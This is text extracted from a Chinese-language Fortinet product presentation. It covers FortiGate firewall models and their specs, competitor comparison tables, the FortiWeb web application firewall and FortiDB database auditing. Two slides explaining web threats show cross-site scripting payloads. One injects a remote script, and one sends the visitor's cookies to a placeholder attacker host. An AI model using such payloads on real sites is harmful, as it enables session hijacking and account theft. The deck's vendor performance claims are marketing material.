互連網(wǎng)公共網(wǎng)絡(luò)資源公共網(wǎng)絡(luò)個體企業(yè)網(wǎng)絡(luò)資源網(wǎng)頁/BBS論壇80安全模塊:垃圾郵件防御應(yīng)用互連網(wǎng)公共郵件資源公共網(wǎng)絡(luò)個體企業(yè)網(wǎng)絡(luò)資源郵件傳輸81安全模塊:

VPN數(shù)據(jù)安全應(yīng)用分支企業(yè)間互連IPSecVPNGRE通道移動用戶訪問IPSecSSLPPTPL2TP

分支企業(yè)

互連網(wǎng)分支企業(yè)中心企業(yè)互連網(wǎng)加密通道加密通道分支/中心企業(yè)82SSLVPN應(yīng)用ClientSTOP!用戶訪問服務(wù)器資源時，客戶端到網(wǎng)關(guān)的數(shù)據(jù)將被加密傳輸，然后進(jìn)行認(rèn)證，輸入正確的用戶名密碼才可以繼續(xù)訪問管理員進(jìn)行服務(wù)器管理員工訪問辦公系統(tǒng)合作伙伴訪問相應(yīng)資源對不同用戶設(shè)置不同的訪問權(quán)限支持SSL加/解密加速支持認(rèn)證方式本地、Radius、LDAP、x.509數(shù)字證書認(rèn)證、WindowsADSSL加密83SSLVPN登錄界面定制歡迎語界面風(fēng)格組件選擇功能選擇終端檢測虛擬桌面84廣域網(wǎng)傳輸優(yōu)化應(yīng)用Internet/WANHTTPCIFSHTTP/CIFS數(shù)據(jù)請求本地存儲文件副本HTTPCIFSH100001111H2DictionaryH1=01010101H2=11110000DictionaryH1=01010101H2=11110000WAN優(yōu)化的目的：通過減少跨廣域網(wǎng)應(yīng)用的通信及數(shù)據(jù)傳輸?shù)臄?shù)量，提高網(wǎng)絡(luò)性能增進(jìn)應(yīng)用的性能,提高工作效率改善帶寬的效率,支持更多的用戶和應(yīng)用分支企業(yè)資源互訪的重要特性85Web網(wǎng)際緩存應(yīng)用WebServerClientHTTPWCCPHTTPWeb緩存技術(shù)可以有效地降低Internet網(wǎng)絡(luò)流量節(jié)約昂貴的廣域網(wǎng)鏈路費(fèi)用提高用戶訪問速度支持WCCP協(xié)議和外部緩沖設(shè)備

86安全模塊:應(yīng)用控制互連網(wǎng)企業(yè)網(wǎng)絡(luò)資源IM聊天P2P傳輸公共網(wǎng)絡(luò)資源87FortiGateUTM安全網(wǎng)關(guān)系列88FortiGate50B-620B中低端產(chǎn)品系列AV=httpthroughput產(chǎn)品型號防火墻VPN策略數(shù)并發(fā)會話新建會話VPN通道FG50B50M45M50025,000200020FG60C1Gbps70M500080,0003000500FG-80C350M80M2,000100,0005000200FG-110C500M/1G100M4,000600,000150001,500FG-310B8G/12G6G/9G8,0001,000,000250003,000FG-620B20G/24G12G/15G8,0001,000,0002800020,000FortiGate-50B–FortiGate-110C89FortiGate1240B-2950B中高端產(chǎn)品系列Performanceresultsdisplayedasbase/fullAMCexpandedusingUDPlargepacketsizesAV=httpapplicationthroughput型號防火墻會話VPN新建會話策略數(shù)

通道FG-1240B40Gbps2000,00024G100000100,00020,000FG-3040B40Gbps4000,00016G100000100,00064,000FG-3950B120Gbps10,000,00048G175000100,00064,00090支持各種Internet接入方式未來的無線網(wǎng)絡(luò)區(qū)域經(jīng)理移動PC信用卡

Web訂購自助機(jī)無線的銷售點(diǎn)

3G91FortiGate-100系列FortiGate-110C基于FortiASICCP的安全加速2個10/100/1000WAN接口8個10/100內(nèi)置交換接口1個控制接口2個USB接口1U高度桌面式設(shè)備配有19”機(jī)架安裝工具性能500Mbps防火墻100MbpsIPSecVPN65Mbps防病毒200MbpsIPSFortiGate-111C內(nèi)置64GSSD硬盤（支持WAN優(yōu)化）92FortiGate-200BFortiGate-200B基于FortiASICCP/NP的安全加速4x標(biāo)準(zhǔn)10/100/1000端口4x加速10/100/1000端口8x標(biāo)準(zhǔn)10/100端口1xFSM存儲插槽(標(biāo)配64GSSD)1個控制接口2個USB接口1U高度性能防火墻：4GbpsIPSecVPN：3Gbps病毒檢測：100Mbps新建會話：20K并發(fā)會話：800K93FortiGate-310BFirewall性能比較Notice:防火墻性能是基于平均包大小512字節(jié)情況下測試的結(jié)果

很多廠家在發(fā)布其產(chǎn)品的性能指標(biāo)是都不透露測試時的包大小。94FortiGate-310B產(chǎn)品對比*AV性能測試基于數(shù)據(jù)流技術(shù),不能緩沖和還原文件FortinetJuniperJuniperCiscoCiscoSonicWallFortiGate-310BSRX-650SSG-550MASA5520

w/Anti-XASA5540NSA5000性能

防火墻吞吐量–平均包大小(512byte)(wAMC)

8Gbps

(12Gbps+AMC)7Gbps1Gbps450Mbps650Mbps1.8Gbps防火墻吞吐量–小包(64byte)(+AMC模塊)

8Gbps

(12Gbps)460Mbps300M163M256MUnknownVPN吞吐量-3DES

(+AMC模塊)

6Gbps

(9Gbps)1.5Gbps300Mbps225Mbps325Mbps1.1GbpsIPS吞吐量

800Mbps900MbpsUnknown225-375Mbps(AIP-SSM-10/20)450Mbps(AIP-SSM-20)

500MbpsIPSecVPN通道數(shù)3,0001000（接口模式300）75050002,500并發(fā)會話數(shù)1,000,000500,000128,000280,000400,000600,000每秒新建會話30,0003,50001500012,00025,0008,500策略8,000

4000UnknownUnknownUnknown硬件配置基本10/100/1000端口1044446模塊插槽166個PIM1N/AN/A產(chǎn)品型號95FortiGate-300系列FortiGate-310B8×1000M電口（小包線速）2×1000M電口（非小包線速）1×單寬AMC插槽2×USB支持RPS冗余電源吞吐量8-12Gbps防火墻（小包）6-9GbpsIPSecVPN（小包）160Mbps防病毒800MbpsIPSAMC擴(kuò)展模塊FortiGate-310B-DC直流電源版本FortiGate-311B2×FSM擴(kuò)展槽內(nèi)置64GSSD硬盤內(nèi)置冗余電源96FortiGate-620B硬件16個FortiASIC網(wǎng)絡(luò)處理器(NP)加速接口4個非NP加速銅口1個單寬AMC插槽2個USB接口支持RPS冗余電源性能16-20Gbps防火墻（小包）12-15GbpsIPSec（小包）250Mbps防病毒1GbpsIPS97FortiGate-620B防火墻性能比較FortiGate-110C防火墻性能是基于平均512字節(jié)數(shù)據(jù)包得出許多競爭對手對公布的性能指標(biāo)沒有數(shù)據(jù)包字節(jié)數(shù)的數(shù)據(jù).98FortiGate-620B產(chǎn)品比較*防病毒性能基于流防病毒掃描Fortinet

FortiGate-620BJuniper

SSG-SRX650ISG2000Cisco

ASA5550

w/Anti-XCheckPoint

UTM-13070性能

防火墻吞吐量-平均包長(512byte)(配置AMC)

16Gbps

(20Gbps)7Gbps4Gbps1.2Gbps4.5Gbps防火墻吞吐量–小包長(64byte)(配置AMC)

16Gbps

(20Gbps)460Mbps2Gbps沒有公布沒有公布IPSecVPN吞吐量-(配置AMC)

12Gbps

(15Gbps)1.5Gbps2Gbps425Mbps1.1GbpsIPS吞吐量1Gbps900MbpsN/A225-325Mbps沒有公布專用IPSecVPN通道數(shù)20,00010,0005,000沒有公布并發(fā)會話1000,000500,000100,0000650,0001,100,000新建會話每秒40,0003,500023,00036,000沒有公布策略數(shù)100,000

30000沒有公布沒有公布硬件配置

固定10/100/1000Port2040-8810模塊插槽可擴(kuò)展4個1G光口60-16N/AN/A99FortiGate-1240B14x加速10/100/1000端口24x加速SFP端口2x標(biāo)準(zhǔn)10/100/1000端口1x單寬AMC插槽6xFSM存儲插槽(單獨(dú)訂購FSM-06464GSSD硬盤)1xUSB1xconsoleport防火墻-40GbpsIPSECVPN-24Gbps病毒檢測-500Mbps新建會話

-

15萬

并發(fā)會話-

200萬最大VDOM:25支持軟件RAID0/1100FortiGate-1240B性能比較項(xiàng)目FG1240BSRX3400NS5200ASA5580-2010/100/1000安全接口

(銅)28N/A2個，

一個ASA5580-4GE-CU可以增加4個接口1Gb安全接口(光纖/銅纜)384+模塊擴(kuò)展0-8一個ASA5580-4GE-FI可以增加4GESRLC10Gb安全接口(光纖)N/A0-20-20-12虛擬防火墻25N/A0-5002/50硬盤/CompactFlash可選384GSSD硬盤N/A128/512MN/A并發(fā)會話2M1M1M1M新建會話/秒100K80K-175K22,00090,000防火墻吞吐量40Gbps10-20Gbps4-10Gbps5GbpsIPS性能4Gbps6Gbps未公布不支持VPN168-位

3DES吞吐量24Gbps6G4-5Gbps1GbpsSSLVPNPeers

15000不支持不支持10,000IPSecVPN通道數(shù)64,00010,00025,00010,000策略數(shù)100,00040,00040,000N/A

FortiGate-3040B101FortiGate-3040B(前面板)FortiGate-3040B(后面板)接口規(guī)范線速10-GbESFP+接口8個線速

1-GbESFP接口10個10/100/1000管理接口2個10G光收發(fā)器2SRSFP+本地64G存儲模塊1個（可擴(kuò)展到4個）

性能規(guī)范

最大網(wǎng)絡(luò)層延遲8.5us防火墻性能40Gbps（64-1518字節(jié)）并發(fā)會話數(shù)500萬新建會話數(shù)10萬

IPSECAES性能16Gbps策略數(shù)10萬FortiGate3950B

102FortiGate-3950BFMC-XD2萬兆接口模塊FMC-XG2IPS加速模塊接口規(guī)范線速10-GbESFP+接口2個（可擴(kuò)展到12個）線速

1-GbESFP接口4個（可擴(kuò)展到100個）10/100/1000管理接口2個10G光收發(fā)器2SRSFP+性能規(guī)范

最大網(wǎng)絡(luò)層延遲8.5us防火墻性能120Gbps（64-1518字節(jié)）并發(fā)會話數(shù)1000萬新建會話數(shù)15萬

IPSECAES性能48Gbps策略數(shù)10萬電源雙交流電源功耗507WFMC-C2020x10/100/1000M接口卡FMC-F2020x1GSFP接口卡1033040B競爭比較FortiGate3040BCiscoASA5580-40CheckPointPower-111085JuniperSRX3600CiscoASA5585-X-SSP60防火墻吞吐40Gbps20Gbps25Gbps30Gbps35Gbps并發(fā)會話4M2M1.2M2.25M2M每秒新建會話100K150KN/A175k350kIPSec性能16Gbps1Gbps4.5Gbps10Gbps5GbpsIPS性能5GbpsUDP1.6GbpsHTTPNo15Gbps10Gbps10G病毒掃描1.2GbpsNoN/ANoNotSupportedWAN優(yōu)化FSM256G存儲NoNoNoNotSupported虛擬域YesUpto50N/AN/A50接口配置固定8x10GigSFP+,10x1GSFP接口2x10/100/1000M管理口，6個接口槽（可配4x1G,2x10G接口卡)

18x10/100/1000M,4x10G8x10/100/1000M接口，4個SFP1G,6個IOC接口槽（可配2×10G，16x1G接口卡）

12x10/100/1000M,8x10GigabitSFP+

103104集成交換矩陣ISF特點(diǎn)獨(dú)特可擴(kuò)展的數(shù)據(jù)包轉(zhuǎn)發(fā)和安全處理結(jié)構(gòu)利用網(wǎng)絡(luò)加速模塊FortiASIC-NP4和IPS加速模塊–SP2實(shí)現(xiàn)數(shù)據(jù)安全處理FMC安全處理卡通過ISF內(nèi)部交換矩陣對任意接口間的通信進(jìn)行加速全網(wǎng)狀的任意接口通信都可以通過ISF連接到FMC進(jìn)行數(shù)據(jù)加速

104105高端萬兆防火墻競爭比較FortiGate3950B思科ASA5580-40JuniperSRX3600Junos10.1JuniperSRX5600Juos10.1JuniperSRX5800Juos10.1H3CSecpathF5000-A5華賽8080E/8160E防火墻性能20-120G20Gbps10-30Gbps10-60G(4SPC)10-120G(8SPC)40Gbps40/80GbpsPPS包轉(zhuǎn)發(fā)率178M4M6M7M(4SPC)15M(8SPC)N/A8-32M（4業(yè)務(wù)卡）/8-64M（8業(yè)務(wù)卡）并發(fā)會話10M2M1-2.25M9M(4SPC)10M(8SPC)4M4-16M(4業(yè)務(wù)卡）/4-32M(8業(yè)務(wù)卡)新建會話175,000（建立關(guān)閉）150，00050,000-175,000350,000(4SPC),只建立）350,000(4SPC),只建立）500,000250k-1M（4業(yè)務(wù)卡）/250k-2M(8業(yè)務(wù)卡)(只建立)IPSec性能8-48G1Gbps10Gbps15G(4SPC)30G(4SPC)N/A4-16G（4業(yè)務(wù)卡）4-32G(8業(yè)務(wù)卡）

IPS性能1.5G-10G(FMC卡)不支持10Gbps15G(4SPC)30G(4SPC)N/AN/A病毒掃描1.5Gbps（代理模式)不支持不支持不支持不支持不支持不支持虛擬域10-2500-50256（SecurityZones)256（SecurityZones)512（SecurityZones)5121024接口配置選擇2x10G,4xGigE,5xFMC槽位（可配2x10G接口卡）2x10/100/1000M管理口，6個接口槽（可配4x1G,2x10G接口卡)8x10/100/1000M接口，4個SFP1G,6個IOC接口槽（可配2×10G，16x1G接口卡）5個/接口IOC插槽，

（可配16×1G卡，40x1G卡，4x10G接口卡）11個接口IOC插槽，

（可配16×1G卡，40x1G卡，4x10G接口卡）4G個接口槽（12xGE(8電＋4光)卡,或者2x10G卡）

8個/16個擴(kuò)展槽（可配5xGE,10xGE,,24xGE，1x10GE，POS)10G滿配接口12x10G12x10G12X10G20x10G44x10G8x10G8x10GFG5000ATCA集群式安全平臺性能線性擴(kuò)展單卡吞吐量20G最大吞吐量160G并發(fā)會話8000萬新建會話80萬FortiGate-5060新安全平臺1078x加速10GESFP+端口2x標(biāo)準(zhǔn)10/100/1000端口內(nèi)置64GBSSD1xUSB&1xconsole防火墻

-40Gbps（小包）

IPSECVPN-17Gbps病毒檢測–

1.5Gbps新建會話

–10萬

并發(fā)會話-

1100萬最大VDOM-2505000萬并發(fā)會話50萬新建會話7.5G病毒檢測FortiSwitch-5003B負(fù)載均衡卡5001B安全處理卡108競爭分析：硬件平臺技術(shù)比較廠商描述技術(shù)特點(diǎn)30B/wifi30B,50B/HD,Wifi50B,80C/CM,110C/HD,310B,620B,3016B,3600A,3810A,5020,5050,5140

ASIC-NP+CP專用硬件加速內(nèi)容層和網(wǎng)絡(luò)層SSG5,20,140,320,350,520,550SRX210,240,650,3400,3600,5400,5800無加速技術(shù)ASA5505,5510,5520,5540,5550,5580無加速技術(shù)U200S,U200M,U200A無加速技術(shù)109競爭分析：安全虛擬化能力安全功能備注防火墻VPNIPS病毒W(wǎng)eb過濾垃圾郵件各項(xiàng)功能均支持虛擬化-VDOMVirtualSystems(VSYS)UTM功能不支持虛擬化VirtualSystems(VSYS)UTM功能不支持虛擬化VirtualSystems(VSYS)UTM功能不支持虛擬化110競爭分析：集中管理能力安全功能備注防火墻VPNIPS病毒W(wǎng)eb過濾垃圾郵件唯一提供全功能集中管理能力的廠商需要第三方管理平臺來管理防病毒、Web過濾和反垃圾郵件需要第三方管理平臺來管理防病毒、Web過濾和反垃圾郵件需要第三方管理平臺來管理防病毒、Web過濾和反垃圾郵件111競爭分析：業(yè)界認(rèn)證安全功能備注FWVPNIPSAVICSAV4.1,EAL4+ICSAV1.2+V2.0(SSL)Yes+NSSYesFortiGate擁有業(yè)界最多的ICSA認(rèn)證，唯一獲得沒有獲得的NSS測試機(jī)構(gòu)的UTM認(rèn)證。ICSAV4.0,EAL4+YesAV認(rèn)證是TrendMicro的ICSAV4.0,EAL4+ICSAV1.2YesAV認(rèn)證是TrendMicro的112競爭分析：安全服務(wù)入侵防御反病毒、反間諜軟件Web過濾反垃圾郵件應(yīng)用控制FortiGuard服務(wù)廠家自有技術(shù)OEM/第三方合作X-UTM需要完善的內(nèi)容防御功能和持續(xù)統(tǒng)一的安全服務(wù)KaperskySurfControlJuniperSymantectrendmicroironportCiscoironport第三方H3C113FortiWeb

應(yīng)用防火墻Web應(yīng)用是什么?Web應(yīng)用是公開的、面對internet的應(yīng)用使用標(biāo)準(zhǔn)的瀏覽器訪問，提供Web郵件、在線零售、在線拍賣、wikis以及許多其它功能為企業(yè)提供電子商務(wù)及商業(yè)推動工具

Web應(yīng)用的編寫是為了高效的傳輸內(nèi)容在多數(shù)情況下，Web應(yīng)用的安全性不是開發(fā)人員優(yōu)先考慮的部分開放的應(yīng)用有可能會暴露敏感信息攻擊由簡單的破壞逐步轉(zhuǎn)變?yōu)樾庞每ê推渌鼈€人身份信息竊取銀行Web服務(wù)器數(shù)據(jù)中心113數(shù)據(jù)庫服務(wù)器前端Web服務(wù)器業(yè)務(wù)數(shù)據(jù)中心邊緣跨站腳本/釣魚攻擊SQL注入，執(zhí)行命令弱口令，暴力破解數(shù)據(jù)與審計日志竄改 溢出攻擊，權(quán)限提升114安恒機(jī)密.|114跨站攻擊獲取COOKIE利用腳本加載一個JS文件，動態(tài)創(chuàng)建一個script標(biāo)記：<TABLEBACKGROUND=javascript:s=document.createElement("script");s.src="/xss.js";document.body.appendChild(s);>

當(dāng)用戶瀏覽貼子時，用戶瀏覽器將自動執(zhí)行上的xss.js腳本利用JS文件指向其它網(wǎng)站當(dāng)用戶瀏覽貼子時，用戶瀏覽器將跳轉(zhuǎn)到另一頁面(如虛假登錄頁面)115Web應(yīng)用防火墻進(jìn)行Web應(yīng)用層分析，透徹理解具體應(yīng)用并攔截滲透性威脅

傳統(tǒng)防火墻檢測網(wǎng)絡(luò)攻擊檢查IP和端口，不能識別應(yīng)用類型IPS產(chǎn)品只能檢測已知的攻擊類型

逃避特殊檢測非常容易，不能對SSL流量進(jìn)行保護(hù)，不能識別應(yīng)用類型不能識別用戶，誤判率高115網(wǎng)絡(luò)訪問(OSI1–3層)協(xié)議(OSI4–7層)網(wǎng)絡(luò)層應(yīng)用層網(wǎng)絡(luò)防火墻IPS及深度包檢測防火墻Web應(yīng)用防火墻FortiWeb

Web應(yīng)用防火墻的特點(diǎn)116手工實(shí)現(xiàn)應(yīng)用安全配置？管理員需要手動指定：每一個URL、目錄、參數(shù)、字段長度和類型。動態(tài)內(nèi)容、JavaScript、XML等的正則表達(dá)式不斷的升級白名單高誤判率–不匹配白名單的流量將被阻止

116117FortiWeb–Web應(yīng)用防火墻117協(xié)議規(guī)范驗(yàn)證數(shù)據(jù)泄漏防護(hù)自學(xué)習(xí)和驗(yàn)證規(guī)則應(yīng)用程序攻擊簽名庫身份驗(yàn)證策略設(shè)備名稱機(jī)架式設(shè)備HTTP事務(wù)處理/秒吞吐量本地存儲FortiWeb-400B1U

機(jī)架設(shè)備10,000100Mb/秒0.5TB標(biāo)配FortiWeb-1000C1U

機(jī)架設(shè)備27,000500Mb/秒1TB標(biāo)配，2TB可選FortiWeb-3000C2U

機(jī)架設(shè)備40，0001Gb/秒2TB標(biāo)配，4TB可選ICSAWeb應(yīng)用防火墻認(rèn)證119在線透明橋模式方便部署，全透明或者傍路支持在線阻擋攻擊反向代理模式

支持請求和服務(wù)器回應(yīng)的內(nèi)容改寫完全支持HTTPS內(nèi)容安全掃描支持HTTPS應(yīng)用優(yōu)化流量負(fù)載均衡旁路部署–

鏡像接口零網(wǎng)絡(luò)延遲通過TCPreset阻擋攻擊用于最初產(chǎn)品評估,非侵入式網(wǎng)絡(luò)部署

FortiWeb靈活的部署方式

Web業(yè)務(wù)應(yīng)用系統(tǒng)網(wǎng)銀

門戶FortiWeb在線部署FortiWeb傍路部署120邏輯規(guī)則自學(xué)習(xí)功能根據(jù)自學(xué)習(xí)結(jié)果，自動生成配置學(xué)習(xí)到的網(wǎng)站結(jié)構(gòu)網(wǎng)頁表單各項(xiàng)參數(shù)學(xué)習(xí)被保護(hù)應(yīng)用程序的結(jié)構(gòu)URLs參數(shù)已知的行為分析訪問攻擊提供自動生成規(guī)則可輸出為PDF文件121Web安全簽名庫技術(shù)由全球FortiGuard云安全網(wǎng)絡(luò)提供服務(wù)，發(fā)現(xiàn)漏洞后，自動更新簽名庫規(guī)則，維護(hù)簡單，內(nèi)置6000條HTTP訪問規(guī)則，自動匹配應(yīng)用邏輯算法,全面檢測web訪問應(yīng)用數(shù)據(jù),動態(tài)安全防御體系<SCRIPT>Document.location=‘http://attackerhost.example/cg-bin/

getcookie.cgi?’+document.cookie</SCRIPT>122應(yīng)用參數(shù)邏輯規(guī)則檢測FortWEB可對受保護(hù)的WEB站點(diǎn)進(jìn)行URL級別控制，針對各種頁面定制個性化規(guī)則，支持條自定義頁面規(guī)則5000-8000網(wǎng)頁上未加限制的字符輸入框，容易受到腳本及注入攻擊123防御暴力破解FortWEB可以針對指定網(wǎng)頁的訪問頻率，超過閾值將被阻止，有效的防止?jié)B透者對關(guān)鍵頁面暴力破解。124網(wǎng)頁防篡改FortiWeb可以發(fā)現(xiàn)被入侵或篡改的網(wǎng)頁被篡改的網(wǎng)頁可以自動或手動恢復(fù)125內(nèi)置Web服務(wù)應(yīng)用掃描器方便的掃描應(yīng)用程序，發(fā)現(xiàn)Web漏洞常見的漏洞SQL注入、跨站攻擊及其它125有助于PCIDSS6.6合規(guī)圖形化報表126SSL安全加密FortiWeb可對原有明文HTTP流量進(jìn)行SSL加密，SSL加密密鑰支持內(nèi)置及客戶自生成證書，服務(wù)器運(yùn)行原有HTTP業(yè)務(wù)，由FortWEB“裝載”了SSL協(xié)商過，此過程FortiASICCP6

芯片進(jìn)行SSL的加/解密運(yùn)算，WebServersClientHTTPSSSLComputationPCIe

加速卡CP6可加速SSL處理板載Flash存儲用來嵌入系統(tǒng)系列號及數(shù)字認(rèn)證127圖形報告審計128銀行應(yīng)用案例129內(nèi)部用戶合法權(quán)限濫用權(quán)限盜用越權(quán)濫用權(quán)限分配不當(dāng)臨時帳號未及時清理備份數(shù)據(jù)缺乏保護(hù)離職員工的后門合作伙伴合法權(quán)限濫用權(quán)限盜用越權(quán)濫用后門程序DB2/SQL/Oracle/Sybase數(shù)據(jù)庫軟件數(shù)據(jù)庫平臺漏洞通訊協(xié)議漏洞弱鑒權(quán)機(jī)制日志缺失或不完整

4W：-是誰，做了什么-什么時候，在哪里跟蹤：-登錄-數(shù)據(jù)/文件訪問-數(shù)據(jù)/文件變化-模式變化-日志竄改-人為錯誤-可疑的活動-自定義事件FortiDB數(shù)據(jù)庫掃描和審計系統(tǒng)130FortinetConfidential 掃描安全隱患-提供修補(bǔ)建議

內(nèi)建最優(yōu)方案

和/或用戶自有標(biāo)準(zhǔn)

持續(xù)掃描系統(tǒng)中的每一個數(shù)據(jù)庫

漏洞掃描自動創(chuàng)建正常訪問行為基準(zhǔn)

不斷掃描使用者的可疑行為

可疑數(shù)據(jù)訪問報警

模板監(jiān)控審計對用戶權(quán)限變化、對象/schema變化、數(shù)據(jù)訪問、數(shù)據(jù)更新事件等提供完整歷史記錄

向數(shù)據(jù)庫管理員、信息安全管理員、審計員審計/法律依從性報告完善的安全掃描和日常數(shù)據(jù)審計131FortinetConfidential 關(guān)鍵特性對漏洞進(jìn)行評估，并提供業(yè)界標(biāo)準(zhǔn)修補(bǔ)建議，以加固數(shù)據(jù)庫的完整性和安全性。這項(xiàng)特性將幫助排除密碼、存取、權(quán)限、配置設(shè)定等方面的弱點(diǎn)。

自動發(fā)現(xiàn)所有的數(shù)據(jù)庫。加速安全及法規(guī)順應(yīng)性建設(shè)。(PCI,SOX,HIPAA)集中特征及策略管理。職責(zé)劃分。易于創(chuàng)建客戶自定義特征及策略。便于識別的報表專家級修復(fù)建議分析數(shù)據(jù)庫安全趨勢支持多種數(shù)據(jù)庫

(Oracle、SQL、DB2UDB、Sybase)數(shù)據(jù)庫漏洞評估132用戶行為監(jiān)控減少系統(tǒng)數(shù)據(jù)信息泄露、攻擊、篡改的